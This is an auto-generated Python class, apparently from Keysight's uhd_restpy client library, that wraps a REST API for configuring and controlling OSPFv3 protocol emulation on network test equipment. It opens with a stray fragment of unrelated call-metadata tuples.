'()\n', (1662, 1664), False, 'from cadnano import app\n'), ((2489, 2494), 'cadnano.app', 'app', ([], {}), '()\n', (2492, 2494), False, 'from cadnano import app\n'), ((3789, 3794), 'cadnano.app', 'app', ([], {}), '()\n', (3792, 3794), False, 'from cadnano import app\n'), ((5236, 5252), 'PyQt5.QtCore.QSize', 'QSize', (['(1100)', '(800)'], {}), '(1100, 800)\n', (5241, 5252), False, 'from PyQt5.QtCore import QPoint, QSize\n'), ((5304, 5320), 'PyQt5.QtCore.QPoint', 'QPoint', (['(200)', '(200)'], {}), '(200, 200)\n', (5310, 5320), False, 'from PyQt5.QtCore import QPoint, QSize\n'), ((2649, 2654), 'cadnano.app', 'app', ([], {}), '()\n', (2652, 2654), False, 'from cadnano import app\n')] |
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class Ospfv3(Base):
"""Ospfv3 Interface level Configuration
The Ospfv3 class encapsulates a list of ospfv3 resources that are managed by the user.
A list of resources can be retrieved from the server using the Ospfv3.find() method.
The list can be managed by using the Ospfv3.add() and Ospfv3.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'ospfv3'
_SDM_ATT_MAP = {
'Active': 'active',
'AdjSID': 'adjSID',
'AreaId': 'areaId',
'AreaIdIp': 'areaIdIp',
'AuthAlgo': 'authAlgo',
'BFlag': 'bFlag',
'ConnectedVia': 'connectedVia',
'Count': 'count',
'DeadInterval': 'deadInterval',
'DemandCircuit': 'demandCircuit',
'DescriptiveName': 'descriptiveName',
'EnableAdjSID': 'enableAdjSID',
'EnableAuthentication': 'enableAuthentication',
'EnableBfdRegistration': 'enableBfdRegistration',
'EnableFastHello': 'enableFastHello',
'EnableIgnoreDbDescMtu': 'enableIgnoreDbDescMtu',
'Errors': 'errors',
'ExternalCapability': 'externalCapability',
'GFlag': 'gFlag',
'HelloInterval': 'helloInterval',
'HelloMultiplier': 'helloMultiplier',
'InstanceId': 'instanceId',
'Key': 'key',
'LFlag': 'lFlag',
'LinkMetric': 'linkMetric',
'LocalRouterID': 'localRouterID',
'Multiplier': 'multiplier',
'Name': 'name',
'NetworkType': 'networkType',
'NssaCapability': 'nssaCapability',
'Ospfv3IfaceState': 'ospfv3IfaceState',
'Ospfv3NeighborState': 'ospfv3NeighborState',
'PFlag': 'pFlag',
'Priority': 'priority',
'Router': 'router',
'SaId': 'saId',
'SessionInfo': 'sessionInfo',
'SessionStatus': 'sessionStatus',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'TypeAreaId': 'typeAreaId',
'V6': 'v6',
'VFlag': 'vFlag',
'Weight': 'weight',
}
def __init__(self, parent):
super(Ospfv3, self).__init__(parent)
@property
def Connector(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector
return Connector(self)
@property
def LearnedInfo(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100.LearnedInfo): An instance of the LearnedInfo class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100 import LearnedInfo
return LearnedInfo(self)
@property
def Active(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Activate/Deactivate Configuration
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def AdjSID(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): An Adjacency Segment Identifier (Adj-SID) represents a router adjacency in Segment Routing
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AdjSID']))
@property
def AreaId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): OSPFv3 Area ID for a non-connected interface, displayed in Interger format
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AreaId']))
@property
def AreaIdIp(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): OSPFv3 Area ID for a non-connected interface, displayed in IP Address format
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AreaIdIp']))
@property
def AuthAlgo(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Algorithms
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthAlgo']))
@property
def BFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): B Flag: Backup Flag: If set, the Adj-SID refers to an adjacency that is eligible for protection
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BFlag']))
@property
def ConnectedVia(self):
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def Count(self):
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DeadInterval(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Dead Interval
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DeadInterval']))
@property
def DemandCircuit(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 5
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DemandCircuit']))
@property
def DescriptiveName(self):
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def EnableAdjSID(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Makes the Adjacency Segment Identifier (Adj-SID) available
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableAdjSID']))
@property
def EnableAuthentication(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Authentication
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableAuthentication']))
@property
def EnableBfdRegistration(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable BFD Registration
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableBfdRegistration']))
@property
def EnableFastHello(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Fast Hello
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableFastHello']))
@property
def EnableIgnoreDbDescMtu(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Ignore DB-Desc MTU
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableIgnoreDbDescMtu']))
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def ExternalCapability(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 1
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExternalCapability']))
@property
def GFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): G-Flag: Group Flag: If set, the G-Flag indicates that the Adj-SID refers to a group of adjacencies where it may be assigned
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GFlag']))
@property
def HelloInterval(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Hello Interval
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HelloInterval']))
@property
def HelloMultiplier(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Hello Multiplier
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HelloMultiplier']))
@property
def InstanceId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Instance ID
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InstanceId']))
@property
def Key(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Key
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Key']))
@property
def LFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): L-Flag: Local Flag. If set, then the value/index carried by the SID has local significance
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LFlag']))
@property
def LinkMetric(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Link Metric
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LinkMetric']))
@property
def LocalRouterID(self):
"""
Returns
-------
- list(str): Router ID
"""
return self._get_attribute(self._SDM_ATT_MAP['LocalRouterID'])
@property
def Multiplier(self):
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NetworkType(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Network Type
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NetworkType']))
@property
def NssaCapability(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 3
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NssaCapability']))
@property
def Ospfv3IfaceState(self):
"""
Returns
-------
- list(str[backup | down | dr | drOther | pointToPoint | unrecognized | waiting]): Logs additional information about the Interface State
"""
return self._get_attribute(self._SDM_ATT_MAP['Ospfv3IfaceState'])
@property
def Ospfv3NeighborState(self):
"""
Returns
-------
- list(str[attempt | down | exchange | exStart | full | init | loading | multiNeighbor | none | twoWay]): Logs additional information about the Neighbor State
"""
return self._get_attribute(self._SDM_ATT_MAP['Ospfv3NeighborState'])
@property
def PFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): P-Flag:Persistent Flag: If set, the SID is persistently allocated. The SID value remains consistent across router restart and session/interface flap
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PFlag']))
@property
def Priority(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Priority (when DR/BDR)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Priority']))
@property
def Router(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 4
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Router']))
@property
def SaId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Security Association ID
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SaId']))
@property
def SessionInfo(self):
"""
Returns
-------
- list(str[ifaceSessInfoAllNbrIn2Way | ifaceSessInfoAllNbrInattempt | ifaceSessInfoAllNbrInDown | ifaceSessInfoAllNbrInExchange | ifaceSessInfoAllNbrInExStart | ifaceSessInfoAllNbrInInit | ifaceSessInfoAllNbrInLoading | ifaceSessInfoFsmNotStarted | ifaceSessInfoSameNbrId | iPAddressNotRcvd | none]): Logs additional information about the session state
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionInfo'])
@property
def SessionStatus(self):
"""
Returns
-------
- list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def StackedLayers(self):
"""
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
"""
return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
"""
Returns
-------
- dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
"""
return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
"""
Returns
-------
- str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
"""
return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def TypeAreaId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Area ID Type
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TypeAreaId']))
@property
def V6(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 0
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['V6']))
@property
def VFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): V-Flag: Value flag. If set, then the SID carries an absolute value label value
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['VFlag']))
@property
def Weight(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Weight of the SID for the purpose of load balancing
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Weight']))
def update(self, ConnectedVia=None, Multiplier=None, Name=None, StackedLayers=None):
"""Updates ospfv3 resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ConnectedVia=None, Multiplier=None, Name=None, StackedLayers=None):
"""Adds a new ospfv3 resource on the server and adds it to the container.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
Returns
-------
- self: This instance with all currently retrieved ospfv3 resources using find and the newly added ospfv3 resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained ospfv3 resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, Errors=None, LocalRouterID=None, Multiplier=None, Name=None, Ospfv3IfaceState=None, Ospfv3NeighborState=None, SessionInfo=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None):
"""Finds and retrieves ospfv3 resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ospfv3 resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all ospfv3 resources from the server.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
- LocalRouterID (list(str)): Router ID
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- Ospfv3IfaceState (list(str[backup | down | dr | drOther | pointToPoint | unrecognized | waiting])): Logs additional information about the Interface State
- Ospfv3NeighborState (list(str[attempt | down | exchange | exStart | full | init | loading | multiNeighbor | none | twoWay])): Logs additional information about the Neighbor State
- SessionInfo (list(str[ifaceSessInfoAllNbrIn2Way | ifaceSessInfoAllNbrInattempt | ifaceSessInfoAllNbrInDown | ifaceSessInfoAllNbrInExchange | ifaceSessInfoAllNbrInExStart | ifaceSessInfoAllNbrInInit | ifaceSessInfoAllNbrInLoading | ifaceSessInfoFsmNotStarted | ifaceSessInfoSameNbrId | iPAddressNotRcvd | none])): Logs additional information about the session state
- SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
- Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
Returns
-------
- self: This instance with matching ospfv3 resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of ospfv3 data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ospfv3 resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def get_device_ids(self, PortNames=None, Active=None, AdjSID=None, AreaId=None, AreaIdIp=None, AuthAlgo=None, BFlag=None, DeadInterval=None, DemandCircuit=None, EnableAdjSID=None, EnableAuthentication=None, EnableBfdRegistration=None, EnableFastHello=None, EnableIgnoreDbDescMtu=None, ExternalCapability=None, GFlag=None, HelloInterval=None, HelloMultiplier=None, InstanceId=None, Key=None, LFlag=None, LinkMetric=None, NetworkType=None, NssaCapability=None, PFlag=None, Priority=None, Router=None, SaId=None, TypeAreaId=None, V6=None, VFlag=None, Weight=None):
"""Base class infrastructure that gets a list of ospfv3 device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- Active (str): optional regex of active
- AdjSID (str): optional regex of adjSID
- AreaId (str): optional regex of areaId
- AreaIdIp (str): optional regex of areaIdIp
- AuthAlgo (str): optional regex of authAlgo
- BFlag (str): optional regex of bFlag
- DeadInterval (str): optional regex of deadInterval
- DemandCircuit (str): optional regex of demandCircuit
- EnableAdjSID (str): optional regex of enableAdjSID
- EnableAuthentication (str): optional regex of enableAuthentication
- EnableBfdRegistration (str): optional regex of enableBfdRegistration
- EnableFastHello (str): optional regex of enableFastHello
- EnableIgnoreDbDescMtu (str): optional regex of enableIgnoreDbDescMtu
- ExternalCapability (str): optional regex of externalCapability
- GFlag (str): optional regex of gFlag
- HelloInterval (str): optional regex of helloInterval
- HelloMultiplier (str): optional regex of helloMultiplier
- InstanceId (str): optional regex of instanceId
- Key (str): optional regex of key
- LFlag (str): optional regex of lFlag
- LinkMetric (str): optional regex of linkMetric
- NetworkType (str): optional regex of networkType
- NssaCapability (str): optional regex of nssaCapability
- PFlag (str): optional regex of pFlag
- Priority (str): optional regex of priority
- Router (str): optional regex of router
- SaId (str): optional regex of saId
- TypeAreaId (str): optional regex of typeAreaId
- V6 (str): optional regex of v6
- VFlag (str): optional regex of vFlag
- Weight (str): optional regex of weight
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
def Abort(self, *args, **kwargs):
"""Executes the abort operation on the server.
Abort CPF control plane (equals to demote to kUnconfigured state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
abort(SessionIndices=list)
--------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
abort(SessionIndices=string)
----------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('abort', payload=payload, response_object=None)
def ClearAllLearnedInfo(self, *args, **kwargs):
"""Executes the clearAllLearnedInfo operation on the server.
Clear All Learned Info
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
clearAllLearnedInfo(SessionIndices=list)
----------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
clearAllLearnedInfo(SessionIndices=string)
------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearAllLearnedInfo', payload=payload, response_object=None)
def ClearAllLearnedInfoInClient(self, *args, **kwargs):
"""Executes the clearAllLearnedInfoInClient operation on the server.
Clears ALL routes from GUI grid for the selected OSPFv3 router.
clearAllLearnedInfoInClient(Arg2=list)list
------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearAllLearnedInfoInClient', payload=payload, response_object=None)
def GetBasicLearnedInfo(self, *args, **kwargs):
"""Executes the getBasicLearnedInfo operation on the server.
Get Basic Learned Info
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
getBasicLearnedInfo(SessionIndices=list)
----------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
getBasicLearnedInfo(SessionIndices=string)
------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
getBasicLearnedInfo(Arg2=list)list
----------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getBasicLearnedInfo', payload=payload, response_object=None)
def GetDetailedLearnedInfo(self, *args, **kwargs):
"""Executes the getDetailedLearnedInfo operation on the server.
Get Detailed Learned Info
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
getDetailedLearnedInfo(SessionIndices=list)
-------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
getDetailedLearnedInfo(SessionIndices=string)
---------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
getDetailedLearnedInfo(Arg2=list)list
-------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getDetailedLearnedInfo', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
restartDown(SessionIndices=list)
--------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
restartDown(SessionIndices=string)
----------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartDown', payload=payload, response_object=None)
def ResumeHello(self, *args, **kwargs):
"""Executes the resumeHello operation on the server.
Resume sending OSPFv3 Hellos
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
resumeHello(SessionIndices=list)
--------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
resumeHello(SessionIndices=string)
----------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('resumeHello', payload=payload, response_object=None)
def Resumehello(self, *args, **kwargs):
"""Executes the resumehello operation on the server.
Starts the protocol state machine for the given protocol session instances.
resumehello(Arg2=list)list
--------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('resumehello', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
"""Executes the start operation on the server.
Start CPF control plane (equals to promote to negotiated state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(SessionIndices=list)
--------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
start(SessionIndices=string)
----------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
"""Executes the stop operation on the server.
Stop CPF control plane (equals to demote to PreValidated-DoDDone state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(SessionIndices=list)
-------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
stop(SessionIndices=string)
---------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
